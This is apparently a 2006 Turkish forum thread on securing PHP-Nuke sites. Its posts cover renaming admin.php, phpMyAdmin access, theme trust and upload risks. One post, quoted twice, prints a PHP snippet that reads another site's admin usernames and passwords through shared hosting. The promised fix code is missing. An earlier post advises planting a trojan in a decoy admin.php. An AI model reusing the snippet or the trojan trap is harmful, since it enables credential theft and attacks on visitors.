admin.php yi Admin Box kurduktan sonra sahte admin.php nin adını xxxxxx.php gibi değiştirerek de koruyabiliriz (tabii ki diğer güvenlik önlemlerine ek olarak)
Kayıt: Mar 18, 2005 Mesajlar: 2176 Konum: istanbul-tokat
Tarih: 2006-01-08, 16:49:50 Mesaj konusu:
mkutan :
phpmyadmin'e sadece cpanelden ulaşabiliyoruz bildiğim kadarıyla. Bunu nasıl aşıyorlar ve ne gibi bir önlem almak gerek acaba?
cpanel ise belli bir phpmyadmin yolu oluyor orayada config.php de ki bilgilerle giriş yapıyor yahut sql bağlantı programları ile bağlanıyorlar.
bütün cpanellerde o yol aynıdır. bu yüzden fazla zorluk çıkarmıyor ;)
Kayıt: Jan 04, 2006 Mesajlar: 135 Konum: İzmit/Konya
Tarih: 2006-01-09, 21:01:14 Mesaj konusu:
bu ilk msjımda werdiiniz emekler için çok teşekkür ederim..benim gibi acemilere :) oldukça yardımcı oluosunuz
saho önceki msjlarında www.nukemods.com temalarının güwenilir olmadıını söylemişsin ben yeni bi nuke sitesi hazırlıorum temayı nukemodstan almıştım..eğer açık warsa bunu nasıl öğrenebilirim..nasıl giderebilirim?uzun bi işse tema için hangi siteleri önerirsin?
Kayıt: Oct 11, 2002 Mesajlar: 164 Konum: İstanbul/Eskişehir
Tarih: 2006-01-13, 17:06:49 Mesaj konusu: Re: Nuke Güvenlik
saho :
cakalderili :
2= Ana dizinde bulunan admin.php dosyasını hostta tutmayın.
Mümkün olduğunca bir yedeğini alın ve işlem sırasında yeniden yükleyin.
7.8 de 3.1 pachti varsa bu işlemi yaptığınızda hata verecektir bunun yerine admin.php nin adını daha sonra config.php den
Kod:
$admin_file = "admin"
yazan yere mesala
xxxx
admin.php adına da xxxxx.php yazdığımızda olay tamamdır
daha sonra admin.php diye bir dosya açıp içine trojan ve ya sürekli popup sayafa açan veyaikisi birden açan bir sayfa hazırlayıp roota atın
lamere trojanı çakın
benim config.php'de $admin_file = "admin" şeklinde bir code yok.. bende mi var bi gariplik ?
Tarih: 2006-01-18, 13:59:48 Mesaj konusu: Re: Nuke Güvenlik
bulduğum bir güvenlik açığı.tamamen alıntıdır.yayınlanmışsada kusura bakmayın
PHP-nuke’de yine SQL komutu satırlarından oluşan bir açık daha tesbit edildi. Bu açık sayesinde aynı sunucuda bulunan siteler tehlikeye düşmektedir. Mesela A ve B siteleri aynı sunucuda bulunuyor. A sitesi B sitesinde de hükmetmek istiyor ve aşağıdaki kodu yazıyor kendi alanına atıyor:
php kodu:
PHP-nuke’de yine SQL komutu satırlarından oluşan bir açık daha tesbit edildi. Bu açık sayesinde aynı sunucuda bulunan siteler tehlikeye düşmektedir. Mesela A ve B siteleri aynı sunucuda bulunuyor. A sitesi B sitesinde de hükmetmek istiyor ve aşağıdaki kodu yazıyor kendi alanına atıyor:
php kodu:
Kod:
<?php
require_once ("/B_sitesi_nuke_klasörü/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid] <br> Password: $record[pwd] <br><br> ";
unset($sql);
?>
Böylece hem kullanıcı adı hem de şifreyi ele geçirmiş oluyor. Bunu önlemek için aşağıdaki kodları config.php dosyanızda üst satırlara bir yere kopyalayın:
php kodu:
Kayıt: Mar 18, 2005 Mesajlar: 2176 Konum: istanbul-tokat
Tarih: 2006-01-20, 12:28:41 Mesaj konusu:
kodlara bakılırsa olabilir böyle bir şey ama yine nuke güvenlik te verilen kodda bunada karşı koyacak bir korunma vardı zaten sadece web üzerindne okuanabliyor dosyalar başka türlü erişilemiyor
bu kadar basit olsa b sitesi nuke klasörü yerine daha üst klasörlere çıklarak host dosyalarına da erişilir, benim gördüğüm kadarıyla hostlar üst klasöre çıkmı izni vermiyo. çok çok önce aklıma buna benzer bişey gelmişti, denemiştim ama olmadı
öncelikle şunu söyleyim bu başlıktaki açıkları kapatırsan zaten sentinel vs. ye ihtiyacın kalmaz. flood neden istemiyoruz, flood atak yaparak siteyi yavaşlattıkları veya durdukları için, e zaten flood gate de maşallah flood atak saldırısını aratmıyo. upload izni verme istenin hiç biyerinde, galeri lerden elinden geldiğince uzak dur, kullansan da upload yapan dosyayı sil, yerine kendin bi dosya hazırla Dosya UPLOAD özelliği kapatılmıştır diye, öyle kullan. en önemlisi forumdur, forum için cracker tracker kullanabilirsin, sql injection saldırılarını kapatır. prefixleri de değiştirisen yeterince güvenliğin olur
Tarih: 2006-01-29, 18:55:00 Mesaj konusu: Re: Nuke Güvenlik
scooter :
bulduğum bir güvenlik açığı.tamamen alıntıdır.yayınlanmışsada kusura bakmayın
PHP-nuke’de yine SQL komutu satırlarından oluşan bir açık daha tesbit edildi. Bu açık sayesinde aynı sunucuda bulunan siteler tehlikeye düşmektedir. Mesela A ve B siteleri aynı sunucuda bulunuyor. A sitesi B sitesinde de hükmetmek istiyor ve aşağıdaki kodu yazıyor kendi alanına atıyor:
php kodu:
PHP-nuke’de yine SQL komutu satırlarından oluşan bir açık daha tesbit edildi. Bu açık sayesinde aynı sunucuda bulunan siteler tehlikeye düşmektedir. Mesela A ve B siteleri aynı sunucuda bulunuyor. A sitesi B sitesinde de hükmetmek istiyor ve aşağıdaki kodu yazıyor kendi alanına atıyor:
php kodu:
Kod:
<?php
require_once ("/B_sitesi_nuke_klasörü/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid] <br> Password: $record[pwd] <br><br> ";
unset($sql);
?>
Böylece hem kullanıcı adı hem de şifreyi ele geçirmiş oluyor. Bunu önlemek için aşağıdaki kodları config.php dosyanızda üst satırlara bir yere kopyalayın:
php kodu:
Eğer Hostta açık varsa bu Mümkündür Ama Bu kadar ufak bir kodla değil
kod baya uzun bu yapılan şeyin adı fso dur yani sadece kendi güvenliğinizi almanız bunları engellemez herhalukarda hostunda güvenliğinin sağlam olması gerekmektedir hemde çok sağlam olmalı
merhaba seyranlı.aşağıdaki cevabında upload izni verme demişsin sitenin hiçbir yerinde.ben forumlarımda resim olayını sık kullanıyorum.Attachment Modunu kullanarak resim uploadına izin veriyorum.Bu da mı acaba açık yaratır bu konuda bilgi verebilirsen sevinirim.iyi çalışmalar
seyranli :
öncelikle şunu söyleyim bu başlıktaki açıkları kapatırsan zaten sentinel vs. ye ihtiyacın kalmaz. flood neden istemiyoruz, flood atak yaparak siteyi yavaşlattıkları veya durdukları için, e zaten flood gate de maşallah flood atak saldırısını aratmıyo. upload izni verme istenin hiç biyerinde, galeri lerden elinden geldiğince uzak dur, kullansan da upload yapan dosyayı sil, yerine kendin bi dosya hazırla Dosya UPLOAD özelliği kapatılmıştır diye, öyle kullan. en önemlisi forumdur, forum için cracker tracker kullanabilirsin, sql injection saldırılarını kapatır. prefixleri de değiştirisen yeterince güvenliğin olur
attachment modunda da bi açık varmıdır bilmem ama php de upload her zman açık riski oluşturur diye düşünüyoeum. ve özellikle yazma erişimi olan klasörler de bi risktir diye düşünüyorum
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız